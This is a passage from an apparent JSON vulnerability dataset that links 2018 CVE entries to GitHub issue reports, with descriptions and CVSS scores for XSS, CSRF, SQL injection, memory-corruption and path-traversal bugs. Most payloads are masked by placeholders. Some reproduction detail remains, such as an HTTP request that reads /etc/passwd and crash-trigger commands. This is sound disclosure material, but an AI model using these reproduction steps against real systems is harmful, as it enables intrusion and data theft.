        "description": "Stored XSS on update comments in NUMBERTAG Greetings, Hello e NUMBERTAG team, while i use this CMS, i found some security issues(maybe, i call it stored xss). Steps to reproduce Open web browser(i used Chrome). Log into e NUMBERTAG with admin. Switch to admin area, and check comments pending, select options 'edit'. In Comments area writes APITAG . Click FILETAG , and found box. FILETAG Impact In Step3, the attack must log in as admin, but the comment can be seen by all user. I hope it helps to improve e NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-17425",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/153",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/153",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-09-19T03:16:02Z",
        "description": "Front end user login Membership Center I want to ask detailed description > storage XSS vulnerabilities found in the system Bulletin. Front end user login Membership Center I want to ask detailed description > storage XSS vulnerabilities found in the system Bulletin poc xss payload: APITAG Steps to Reproduce URLTAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-17426",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/154",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/154",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-09-19T05:16:06Z",
        "description": "WUZHI CMS NUMBERTAG There is a a Stored XSS . WUZHI CMS NUMBERTAG There is a a Stored XSS Extension module SMS in station POC APITAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-17427",
        "Issue_Url_old": "https://github.com/lemire/simdcomp/issues/21",
        "Issue_Url_new": "https://github.com/lemire/simdcomp/issues/21",
        "Repo_new": "lemire/simdcomp",
        "Issue_Created_At": "2018-09-19T05:38:33Z",
        "description": "heap buffer overflow (detected by APITAG Here is my function APITAG : FILETAG sizeof in is NUMBERTAG packing unpacking APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG at pc NUMBERTAG a NUMBERTAG bp NUMBERTAG ffe5a NUMBERTAG c NUMBERTAG sp NUMBERTAG ffe5a NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG thread T NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG ab NUMBERTAG PATHTAG NUMBERTAG eac7 ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG f ( PATHTAG NUMBERTAG d5c ( PATHTAG NUMBERTAG cc NUMBERTAG PATHTAG NUMBERTAG f1c2cf NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG cc NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG b0 ( PATHTAG NUMBERTAG aaeb ( PATHTAG NUMBERTAG eac7 ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG f ( PATHTAG NUMBERTAG d5c ( PATHTAG NUMBERTAG cc NUMBERTAG PATHTAG NUMBERTAG f1c2cf NUMBERTAG b NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow ( PATHTAG ) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fd fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a NUMBERTAG fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING MS NUMBERTAG APITAG APITAG ; base unit: APITAG APITAG PATHTAG ) PATHTAG ) artifact_prefix='./'; Test unit written to ./crash APITAG Base NUMBERTAG PATHTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17429",
        "Issue_Url_old": "https://github.com/jetiben/jtbc/issues/4",
        "Issue_Url_new": "https://github.com/jetiben/jtbc/issues/4",
        "Repo_new": "jetiben/jtbc",
        "Issue_Created_At": "2018-09-18T08:08:14Z",
        "description": "There is CSRF vulnerability that can add the administrator account. PATHTAG in JTBC NUMBERTAG C) has APITAG the administrator logged in, open the csrf exp page,will be add a administrator. csrf exp: FILETAG CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17556",
        "Issue_Url_old": "https://github.com/modxcms/revolution/issues/14094",
        "Issue_Url_new": "https://github.com/modxcms/revolution/issues/14094",
        "Repo_new": "modxcms/revolution",
        "Issue_Created_At": "2018-09-26T06:04:30Z",
        "description": "Stored XSS. Stored XSS: The application is vulnerable to stored XSS. Step to reproduce NUMBERTAG Under Media APITAG sources choose Create New Media source and enter the Xss Payload APITAG in the Name field and click on save NUMBERTAG The application renders the entered script and displays a pop up whenever the page is being visited by the user. Observed behavior The application processes the html tags or scripts and it is getting stored in the database. Expected behavior It should not accept any scripts or html tags. Environment MODX version:MODX Revolution NUMBERTAG pl",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-17566",
        "Issue_Url_old": "https://github.com/top-think/think/issues/858",
        "Issue_Url_new": "https://github.com/top-think/think/issues/858",
        "Repo_new": "top-think/think",
        "Issue_Created_At": "2018-09-26T09:32:14Z",
        "description": "Thinkphp NUMBERTAG delete\u51fd\u6570\u8bbe\u8ba1\u7f3a\u9677\u5efa\u8bae\u4fee\u6539. APITAG FILETAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17574",
        "Issue_Url_old": "https://github.com/YMFE/yapi/issues/520",
        "Issue_Url_new": "https://github.com/ymfe/yapi/issues/520",
        "Repo_new": "ymfe/yapi",
        "Issue_Created_At": "2018-08-31T07:57:46Z",
        "description": "Stored XSS in Project Name. Version NUMBERTAG Problem ~ Stored XSS in Project Name NUMBERTAG Register a account in the demo domain FILETAG Then new a project: FILETAG NUMBERTAG When the someone including the managers & administrators views the operation dynamics of the project, malicious js code will execute. FILETAG \u4ec0\u4e48\u6d4f\u89c8\u5668 ~ chrome APITAG Windows, APITAG ~ Linux",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-17580",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/485",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/485",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2018-09-25T11:06:23Z",
        "description": "Heap Overflow in APITAG There exists a heap buffer overflow in function APITAG in the file APITAG of tcpreplay NUMBERTAG The issue can be reproduced when provided with an crafted pcap file as an input to the tcpreplay binary. Affected version NUMBERTAG branch Command : sudo tcpreplay i eno1 t K loop NUMBERTAG unique ip $POC Debugging CODETAG APITAG ASAN output ERRORTAG glibc detection ERRORTAG Reproducer File URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-17581",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/460",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/460",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-09-25T16:06:25Z",
        "description": "Stack overflow due to excessive stack consumption APITAG function). A stack overflow exits in APITAG at APITAG due to a recursive function call causing the excessive stack consumption which leads to Denial of service. Affected version: exi NUMBERTAG bit build) Command: ./exi NUMBERTAG pi $POC Debugging CODETAG ASAN Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17582",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/484",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/484",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2018-09-24T14:33:44Z",
        "description": "Heap overflow in APITAG tcpreplay contains a heap based buffer overflow vulnerability. The APITAG function in the APITAG file uses the APITAG function to copy sequences from the source buffer pktdata to the destination APITAG . However, there are no checks in place to ensure that dst is a non zero value. An attacker can exploit this vulnerability by submitting a malicious file that exploits this issue. This will result in a Denial of Service APITAG and potentially Information Exposure when the application attempts to process the file. Affected version NUMBERTAG branch Command : sudo tcpreplay i eno1 t K loop NUMBERTAG unique ip $POC Debugging CODETAG CODETAG ERRORTAG CODETAG ASAN output ERRORTAG Valgrind report CODETAG Please check if you are able to reproduce the issue via the Reproducer file URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-17785",
        "Issue_Url_old": "https://github.com/blynkkk/blynk-server/issues/1256",
        "Issue_Url_new": "https://github.com/blynkkk/blynk-server/issues/1256",
        "Repo_new": "blynkkk/blynk-server",
        "Issue_Created_At": "2018-09-30T05:56:51Z",
        "description": "Path operation vulnerability NUMBERTAG normal boot software eg\uff1a java jar FILETAG APITAG Blynk/ APITAG paths and grab packets Modify HTTP request packet eg NUMBERTAG GET PATHTAG HTTP NUMBERTAG Host: APITAG Connection: Keep alive Accept Encoding: gzip,deflate User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: / eg NUMBERTAG GET PATHTAG HTTP NUMBERTAG Host: APITAG Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Referer: URLTAG Cookie: session=f NUMBERTAG e NUMBERTAG f NUMBERTAG b NUMBERTAG b You can access /etc/passwd. FILETAG FILETAG FILETAG Thank you very much \uff01",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17796",
        "Issue_Url_old": "https://github.com/wuweiit/mushroom/issues/16",
        "Issue_Url_new": "https://github.com/wuweiit/mushroom/issues/16",
        "Repo_new": "wuweiit/mushroom",
        "Issue_Created_At": "2018-09-21T06:30:41Z",
        "description": "SQL injection vulnerability was discovered in MRCMS. Hi all, There are a SQL injection vulnerability found by Qihoo NUMBERTAG APITAG Team. Details as bellow: The APITAG method in the APITAG java file is used directly to hash and run SQL statements without filtering parameters, resulting in SQL injection\u3002 FILETAG Continuous tracing can be found that the APITAG method is invoked in APITAG FILETAG View APITAG () method FILETAG When param is empty (that is the first time), a param will be constructed \uff0c view the constructor. FILETAG You can see that all attributes in APITAG are obtained from request and are controlled by attackers.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17825",
        "Issue_Url_old": "https://github.com/adplug/adplug/issues/67",
        "Issue_Url_new": "https://github.com/adplug/adplug/issues/67",
        "Repo_new": "adplug/adplug",
        "Issue_Created_At": "2018-09-04T02:57:54Z",
        "description": "double free in APITAG There are several suspected double free bugs ( CVETAG with APITAG in APITAG This destructor calls APITAG and APITAG in succession. As defined in fmopl.c, however, APITAG OPL) calls APITAG which invokes APITAG APITAG frees the four global pointers TL_TABLE, SIN_TABLE, AMS_TABLE, VIB_TABLE by simply using the APITAG method. Therefore, the two successive calls of APITAG in APITAG are likely to cause double frees of the four pointers. One possible fix could be directly assigning each pointer to NULL after calling APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17828",
        "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/62",
        "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/62",
        "Repo_new": "gdraheim/zziplib",
        "Issue_Created_At": "2018-09-25T13:32:45Z",
        "description": "Directory traversal vulnerability in zziplib NUMBERTAG Directory traversal vulnerability in zziplib NUMBERTAG allows attackers to overwrite arbitrary files via a .. (dot dot) in an zip file. $unzzip mem FILETAG FILETAG Relevant code in function unzzip_cat in Unzzipcat mem.c: static int unzzip_cat (int argc, char argv, int extract) { ...... if (argc NUMBERTAG print directory list / ZZIP_MEM_ENTRY entry = APITAG DBG2(\"findfirst %p \", entry); for (; entry ; entry = zzip_mem_disk_findnext(disk, entry)) { char name = zzip_mem_entry_to_name (entry); FILE out = stdout; if (extract) out = create_fopen(name, \"wb NUMBERTAG no checkout here if (! out) { if (errno != EISDIR) { DBG3(\"can not open output file %i %s\", errno, strerror(errno)); done = EXIT_ERRORS; } continue; } unzzip_mem_disk_cat_file (disk, name, out); if (extract) fclose(out); } } ...... } static void APITAG disk, char name, FILE out) { ZZIP_DISK_FILE file = zzip_mem_disk_fopen (disk, name); if (file) { char buffer NUMBERTAG int len; while ((len = zzip_mem_disk_fread (buffer NUMBERTAG file))) { fwrite (buffer NUMBERTAG len, out); } zzip_mem_disk_fclose (file); } }",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-17830",
        "Issue_Url_old": "https://github.com/redaxo/redaxo4/issues/421",
        "Issue_Url_new": "https://github.com/redaxo/redaxo4/issues/421",
        "Repo_new": "redaxo/redaxo4",
        "Issue_Created_At": "2018-09-25T07:31:11Z",
        "description": "Reflected Cross site scripting (XSS) vulnerability in REDAXO NUMBERTAG details in PATHTAG ERRORTAG It is worth noting that the value of $args here is introduced from the HTTP request. And the value is an array. Then the $args is processed by foreach. The program uses the htmlspecialchars function to process $arg_value, but does not handle $arg_name.So an attacker can insert an attack payload at $arg_name to cause XSS. POC The user directly accesses the URL if the user has logged in. URLTAG FILETAG Credit: APITAG of APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-17831",
        "Issue_Url_old": "https://github.com/redaxo/redaxo/issues/2043",
        "Issue_Url_new": "https://github.com/redaxo/redaxo/issues/2043",
        "Repo_new": "redaxo/redaxo",
        "Issue_Created_At": "2018-09-26T05:41:03Z",
        "description": "Sql Injection in Redaxo NUMBERTAG details in PATHTAG ERRORTAG Called the APITAG APITAG the function in PATHTAG ERRORTAG When the if condition is true, the function returns the value of the sort parameter obtained from the HTTP request. Go back to the APITAG function above. CODETAG When the value of APITAG is not empty, APITAG is directly spliced into the SQL statement. Caused SQL injection. Since this file APITAG is used by many functions in this system. So there are a lot of SQL injections. FILETAG At this point the URL becomes URLTAG Change the URL as follows: URLTAG APITAG APITAG Then visit the URL and you will see a response delay of NUMBERTAG s APITAG FILETAG The complete SQL statement executed is CODETAG Credit: APITAG of APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17835",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1298",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1298",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2018-09-28T04:08:28Z",
        "description": "Insert Stored XSS in FILETAG . Type of vulnerability: Stored XSS Discovered by: iso NUMBERTAG Description: Stored XSS attack is one of the three major categories of XSS attacks, the others being Non Persistent (or Reflected) XSS and DOM based XSS. Step to reproduce the vulnerability: APITAG the CMS. APITAG Page FILETAG APITAG XSS payload (\"> APITAG <\") in the APITAG Permalink Structure\" parameter and click on APITAG Setting\". FILETAG APITAG Page FILETAG APITAG \"www\" in the title and body , click on \"save page\" to publish the page. FILETAG APITAG , as shown in the figure. FILETAG APITAG the page FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-17847",
        "Issue_Url_old": "https://github.com/golang/go/issues/27846",
        "Issue_Url_new": "https://github.com/golang/go/issues/27846",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2018-09-25T08:05:30Z",
        "description": "PATHTAG panic: runtime error: index out of range. Please answer these questions before submitting your issue. Thanks! What version of Go are you using ( go version )? APITAG Does this issue reproduce with the latest release? yes What operating system and processor architecture are you using ( go env )? CODETAG What did you do? CODETAG What did you expect to see? No panic exit What did you see instead? ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17965",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1052",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1052",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-03-24T16:32:42Z",
        "description": "Memory leak in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17966",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1050",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1050",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-03-24T16:31:46Z",
        "description": "Memory leak in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17967",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1051",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1051",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-03-24T16:32:17Z",
        "description": "Memory leak in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17974",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/486",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/486",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2018-10-03T16:37:25Z",
        "description": "Heap overflow in APITAG . An heap overflow was triggered in function APITAG at file APITAG , due to inappropriate values in the function APITAG The length (pktlen + ctx > l2len) is larger than source value (packet + ctx >l2len) as the function failed to ensure the length of a packet is valid, causing segmentation fault. Affected version NUMBERTAG branch Command : sudo tcpreplay edit APITAG intf1=ens NUMBERTAG intf2=lo enet vlan=add enet vlan tag NUMBERTAG POC Debugging: ERRORTAG CODETAG ERRORTAG ASAN output ERRORTAG Please check if you are able to reproduce the issue via the Reproducer file URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-17986",
        "Issue_Url_old": "https://github.com/smiffy6969/razorCMS/issues/53",
        "Issue_Url_new": "https://github.com/smiffy6969/razorcms/issues/53",
        "Repo_new": "smiffy6969/razorCMS",
        "Issue_Created_At": "2018-09-06T07:37:06Z",
        "description": "CSRF Vulnerability. APITAG version NUMBERTAG Operating System Used: Microsoft Windows NUMBERTAG ulnerability Type: Cross Site Request Forgery(CSRF) Severity: High Vulnerability Description: CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the targeted end user is a normal user, a successful CSRF attack can compromise sensitive data. If the targeted end user is the administrator account, this type of attack can compromise the entire web application. STEPS TO REPRODUCE NUMBERTAG Log in to the Administrator user account. Crafted Code: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG Run the above code which changes the password of admin user to \"test APITAG NUMBERTAG After submitting the code the password is successfully changed.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-17988",
        "Issue_Url_old": "https://github.com/AndyRixon/LayerBB/issues/51",
        "Issue_Url_new": "https://github.com/andyrixon/layerbb/issues/51",
        "Repo_new": "andyrixon/layerbb",
        "Issue_Created_At": "2019-10-10T14:13:40Z",
        "description": "SQL injection vulnerability. APITAG NUMBERTAG has SQL Injection via the FILETAG search_query parameter. Steps to Reproduce Issue in FILETAG NUMBERTAG CODETAG Unfiltered search_query results in SQL injection POC Packet parameters CODETAG Server Environment (PHP, APITAG Apache Version and Operating System): version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17996",
        "Issue_Url_old": "https://github.com/AndyRixon/LayerBB/issues/38",
        "Issue_Url_new": "https://github.com/andyrixon/layerbb/issues/38",
        "Repo_new": "AndyRixon/LayerBB",
        "Issue_Created_At": "2019-02-28T07:00:14Z",
        "description": "APITAG NUMBERTAG CSRF Vulnerability APITAG Users). Vulnerability analysis APITAG added csrf_token to post request to prevent csrf vulnerability; at the time, get request was not prevented; there was still a csrf vulnerability that could be exploited. In the FILETAG file, the delete user is requested by get. FILETAG POC When the administrator accesses the following url, the account with id NUMBERTAG will be deleted. APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18016",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1049",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1049",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-03-24T16:31:24Z",
        "description": "Memory leak in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18020",
        "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/243",
        "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/243",
        "Repo_new": "qpdf/qpdf",
        "Issue_Created_At": "2018-10-06T08:50:15Z",
        "description": "A hangs close to ten minutes in qpdf . hi,I find something maybe wrong in the newest qpdf. the poc file will cause the program to be hanged about ten minutes. Maybe this is a bug or feature? FILETAG and I found that it maybe caused by the APITAG in APITAG are some backtrace: ERRORTAG Looking forward to you reply,thx : )",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
        "severity": "LOW",
        "baseScore": 3.3,
        "impactScore": 1.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-18023",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1336",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1336",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-10-05T12:06:20Z",
